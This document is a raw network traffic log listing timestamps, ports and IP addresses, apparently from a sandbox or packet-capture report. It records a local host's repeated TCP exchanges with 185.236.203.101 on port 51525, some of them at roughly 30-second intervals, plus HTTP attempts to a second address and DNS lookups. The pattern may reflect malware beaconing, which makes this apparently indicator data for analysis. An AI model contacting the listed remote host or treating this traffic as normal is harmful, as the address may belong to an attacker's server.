                                                                                                      Oct 17, 2024 15:03:49.742264986 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:49.742320061 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:49.742326975 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:49.742352962 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:49.742407084 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:49.742414951 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:49.771723032 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.444608927 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.444634914 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.444662094 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.444677114 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.444688082 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.444725990 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.445190907 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.445218086 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.445244074 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.445259094 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.445271015 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.445311069 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.476857901 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.477236986 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.477267981 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.477283001 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.477324009 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.477359056 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.477370977 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.477546930 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.477581978 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.477592945 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.477672100 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.477715969 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.477741957 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.477782965 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.477827072 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.477855921 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.477889061 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.477926970 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.518171072 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.518210888 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.518244982 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.518275976 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.558686972 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.812195063 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.812242985 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.812319040 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.812354088 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.812357903 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.812410116 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.812416077 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.812444925 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.812488079 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.812515020 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.812550068 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.812582970 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.812592983 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.812618971 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.812654018 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.812669039 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.812689066 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.812720060 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.812733889 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.812925100 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.812957048 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.812973022 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.812992096 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.812999964 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.813030958 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.813076019 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.813077927 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.813111067 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.813138962 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.813155890 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.813174009 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.813208103 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.813230991 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.813241959 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.813275099 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.813285112 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.813309908 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.813343048 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.813355923 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.813376904 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.813410997 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.813421011 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.813462973 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.813504934 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.813618898 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.813652992 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.813690901 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.813692093 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.814285040 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.814321041 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.814337015 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.814356089 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.814393044 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.814404011 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.814429998 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.814461946 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.814466000 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.814497948 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.814531088 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.814548016 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.814564943 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.814620018 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.814623117 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.814640999 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.814673901 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.814696074 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.814714909 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.814765930 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.814800024 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.814824104 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.814851046 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.814884901 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.814898968 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.820116997 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.820167065 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.820171118 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.820204973 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.820247889 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.820344925 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.820378065 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.820415020 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.820422888 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.821031094 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.821075916 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.821110010 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.821145058 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.821178913 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.821191072 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.821213961 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.821254969 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.822038889 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.822089911 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.822125912 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.822134018 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.822165012 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.822202921 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.822208881 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.822884083 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.822917938 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.822931051 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.822952032 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.822985888 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.822994947 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.823020935 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.823062897 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.823741913 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.823777914 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.823812008 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.823821068 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.823846102 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.823889971 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.826076984 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.826112032 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.826147079 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.826163054 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.826248884 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.826282024 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.826292038 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.826316118 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.826359034 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.826848030 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.826880932 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.826914072 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.826930046 CEST4985951525192.168.2.5185.236.203.101
Oct 17, 2024 15:03:50.827217102 CEST | 51525 | 49859 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:03:50.827250004 CEST | 51525 | 49859 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:03:50.827259064 CEST | 49859 | 51525 | 192.168.2.5 | 185.236.203.101
Oct 17, 2024 15:03:50.827284098 CEST | 51525 | 49859 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:03:50.827318907 CEST | 49859 | 51525 | 192.168.2.5 | 185.236.203.101
Oct 17, 2024 15:03:50.827505112 CEST | 51525 | 49859 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:03:50.827538967 CEST | 51525 | 49859 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:03:50.827573061 CEST | 51525 | 49859 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:03:50.827575922 CEST | 49859 | 51525 | 192.168.2.5 | 185.236.203.101
Oct 17, 2024 15:03:50.831207991 CEST | 49859 | 51525 | 192.168.2.5 | 185.236.203.101
Oct 17, 2024 15:03:50.866894960 CEST | 51525 | 49859 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:03:50.866985083 CEST | 49859 | 51525 | 192.168.2.5 | 185.236.203.101
Oct 17, 2024 15:03:50.867017031 CEST | 51525 | 49859 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:03:50.867048025 CEST | 51525 | 49859 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:03:50.867080927 CEST | 51525 | 49859 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:03:50.867089987 CEST | 49859 | 51525 | 192.168.2.5 | 185.236.203.101
Oct 17, 2024 15:03:50.908273935 CEST | 51525 | 49859 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:03:50.908368111 CEST | 49859 | 51525 | 192.168.2.5 | 185.236.203.101
Oct 17, 2024 15:03:50.908410072 CEST | 51525 | 49859 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:03:50.908446074 CEST | 51525 | 49859 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:03:50.908499002 CEST | 49859 | 51525 | 192.168.2.5 | 185.236.203.101
Oct 17, 2024 15:03:50.908502102 CEST | 51525 | 49859 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:03:50.908551931 CEST | 51525 | 49859 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:03:50.908605099 CEST | 51525 | 49859 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:03:50.908610106 CEST | 49859 | 51525 | 192.168.2.5 | 185.236.203.101
Oct 17, 2024 15:03:50.908638000 CEST | 51525 | 49859 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:03:50.908674002 CEST | 51525 | 49859 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:03:50.908684969 CEST | 49859 | 51525 | 192.168.2.5 | 185.236.203.101
Oct 17, 2024 15:03:50.908708096 CEST | 51525 | 49859 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:03:50.908742905 CEST | 51525 | 49859 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:03:50.908752918 CEST | 49859 | 51525 | 192.168.2.5 | 185.236.203.101
Oct 17, 2024 15:03:50.908796072 CEST | 51525 | 49859 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:03:50.908828020 CEST | 51525 | 49859 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:03:50.908843040 CEST | 49859 | 51525 | 192.168.2.5 | 185.236.203.101
Oct 17, 2024 15:03:50.908879995 CEST | 51525 | 49859 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:03:50.908915043 CEST | 51525 | 49859 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:03:50.908948898 CEST | 51525 | 49859 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:03:50.908958912 CEST | 49859 | 51525 | 192.168.2.5 | 185.236.203.101
Oct 17, 2024 15:03:50.908986092 CEST | 51525 | 49859 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:03:50.909009933 CEST | 49859 | 51525 | 192.168.2.5 | 185.236.203.101
Oct 17, 2024 15:03:50.941924095 CEST | 51525 | 49859 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:03:50.941962004 CEST | 51525 | 49859 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:03:50.941997051 CEST | 49859 | 51525 | 192.168.2.5 | 185.236.203.101
Oct 17, 2024 15:03:50.941998005 CEST | 51525 | 49859 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:03:50.942051888 CEST | 51525 | 49859 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:03:50.942059994 CEST | 49859 | 51525 | 192.168.2.5 | 185.236.203.101
Oct 17, 2024 15:03:50.942086935 CEST | 51525 | 49859 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:03:50.942152977 CEST | 49859 | 51525 | 192.168.2.5 | 185.236.203.101
Oct 17, 2024 15:03:50.943120003 CEST | 51525 | 49859 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:03:50.943254948 CEST | 51525 | 49859 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:03:50.943286896 CEST | 51525 | 49859 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:03:50.943303108 CEST | 49859 | 51525 | 192.168.2.5 | 185.236.203.101
Oct 17, 2024 15:03:50.943321943 CEST | 51525 | 49859 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:03:50.943368912 CEST | 49859 | 51525 | 192.168.2.5 | 185.236.203.101
Oct 17, 2024 15:03:50.943370104 CEST | 51525 | 49859 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:03:50.943432093 CEST | 51525 | 49859 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:03:50.943466902 CEST | 51525 | 49859 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:03:50.943480015 CEST | 49859 | 51525 | 192.168.2.5 | 185.236.203.101
Oct 17, 2024 15:03:50.943506002 CEST | 51525 | 49859 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:03:50.943553925 CEST | 49859 | 51525 | 192.168.2.5 | 185.236.203.101
Oct 17, 2024 15:03:50.983484983 CEST | 51525 | 49859 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:03:50.983525038 CEST | 51525 | 49859 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:03:50.983558893 CEST | 51525 | 49859 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:03:50.983589888 CEST | 49859 | 51525 | 192.168.2.5 | 185.236.203.101
Oct 17, 2024 15:03:51.024328947 CEST | 51525 | 49859 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:03:51.024385929 CEST | 49859 | 51525 | 192.168.2.5 | 185.236.203.101
Oct 17, 2024 15:03:51.024410963 CEST | 51525 | 49859 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:03:51.024446011 CEST | 51525 | 49859 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:03:51.024482012 CEST | 51525 | 49859 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:03:51.024491072 CEST | 49859 | 51525 | 192.168.2.5 | 185.236.203.101
Oct 17, 2024 15:03:51.024516106 CEST | 51525 | 49859 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:03:51.024549961 CEST | 51525 | 49859 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:03:51.024554014 CEST | 49859 | 51525 | 192.168.2.5 | 185.236.203.101
Oct 17, 2024 15:03:51.064934015 CEST | 49859 | 51525 | 192.168.2.5 | 185.236.203.101
Oct 17, 2024 15:03:53.888139009 CEST | 49859 | 51525 | 192.168.2.5 | 185.236.203.101
Oct 17, 2024 15:03:53.893062115 CEST | 51525 | 49859 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:03:53.893126011 CEST | 51525 | 49859 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:03:53.893156052 CEST | 49859 | 51525 | 192.168.2.5 | 185.236.203.101
Oct 17, 2024 15:03:53.893158913 CEST | 51525 | 49859 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:03:53.893188953 CEST | 49859 | 51525 | 192.168.2.5 | 185.236.203.101
Oct 17, 2024 15:03:53.893196106 CEST | 51525 | 49859 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:03:53.893199921 CEST | 49859 | 51525 | 192.168.2.5 | 185.236.203.101
Oct 17, 2024 15:03:53.893224955 CEST | 51525 | 49859 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:03:53.893291950 CEST | 51525 | 49859 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:03:53.893321037 CEST | 51525 | 49859 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:03:53.893371105 CEST | 51525 | 49859 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:03:53.893399000 CEST | 51525 | 49859 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:03:53.893425941 CEST | 51525 | 49859 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:03:53.898298025 CEST | 51525 | 49859 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:03:53.898550987 CEST | 51525 | 49859 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:03:53.898565054 CEST | 51525 | 49859 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:03:53.898612976 CEST | 51525 | 49859 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:03:53.898626089 CEST | 51525 | 49859 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:03:53.898638964 CEST | 51525 | 49859 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:03:53.898654938 CEST | 51525 | 49859 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:03:53.910657883 CEST | 49859 | 51525 | 192.168.2.5 | 185.236.203.101
Oct 17, 2024 15:03:53.916260004 CEST | 51525 | 49859 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:03:53.916332006 CEST | 49859 | 51525 | 192.168.2.5 | 185.236.203.101
Oct 17, 2024 15:03:56.555666924 CEST | 51525 | 49848 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:03:56.558089018 CEST | 49848 | 51525 | 192.168.2.5 | 185.236.203.101
Oct 17, 2024 15:03:56.563338041 CEST | 51525 | 49848 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:04:26.635195971 CEST | 51525 | 49848 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:04:26.639230967 CEST | 49848 | 51525 | 192.168.2.5 | 185.236.203.101
Oct 17, 2024 15:04:26.644491911 CEST | 51525 | 49848 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:04:56.687809944 CEST | 51525 | 49848 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:04:56.689558983 CEST | 49848 | 51525 | 192.168.2.5 | 185.236.203.101
Oct 17, 2024 15:04:56.694384098 CEST | 51525 | 49848 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:05:24.418140888 CEST | 49860 | 80 | 192.168.2.5 | 178.237.33.50
Oct 17, 2024 15:05:24.886763096 CEST | 49860 | 80 | 192.168.2.5 | 178.237.33.50
Oct 17, 2024 15:05:25.574317932 CEST | 49860 | 80 | 192.168.2.5 | 178.237.33.50
Oct 17, 2024 15:05:26.751234055 CEST | 51525 | 49848 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:05:26.752856016 CEST | 49848 | 51525 | 192.168.2.5 | 185.236.203.101
Oct 17, 2024 15:05:26.757927895 CEST | 51525 | 49848 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:05:26.886727095 CEST | 49860 | 80 | 192.168.2.5 | 178.237.33.50
Oct 17, 2024 15:05:29.480496883 CEST | 49860 | 80 | 192.168.2.5 | 178.237.33.50
Oct 17, 2024 15:05:34.371083021 CEST | 49860 | 80 | 192.168.2.5 | 178.237.33.50
Oct 17, 2024 15:05:43.980465889 CEST | 49860 | 80 | 192.168.2.5 | 178.237.33.50
Oct 17, 2024 15:05:56.821024895 CEST | 51525 | 49848 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:05:56.822993040 CEST | 49848 | 51525 | 192.168.2.5 | 185.236.203.101
Oct 17, 2024 15:05:56.827994108 CEST | 51525 | 49848 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:06:26.906086922 CEST | 51525 | 49848 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:06:26.908046007 CEST | 49848 | 51525 | 192.168.2.5 | 185.236.203.101
Oct 17, 2024 15:06:26.912924051 CEST | 51525 | 49848 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:06:57.184550047 CEST | 51525 | 49848 | 185.236.203.101 | 192.168.2.5
Oct 17, 2024 15:06:57.190066099 CEST | 49848 | 51525 | 192.168.2.5 | 185.236.203.101
Oct 17, 2024 15:06:57.195034027 CEST | 51525 | 49848 | 185.236.203.101 | 192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 17, 2024 15:03:05.839698076 CEST | 59542 | 53 | 192.168.2.5 | 1.1.1.1
Oct 17, 2024 15:03:05.877800941 CEST | 53 | 59542 | 1.1.1.1 | 192.168.2.5
Oct 17, 2024 15:03:34.451427937 CEST | 58062 | 53 | 192.168.2.5 | 1.1.1.1
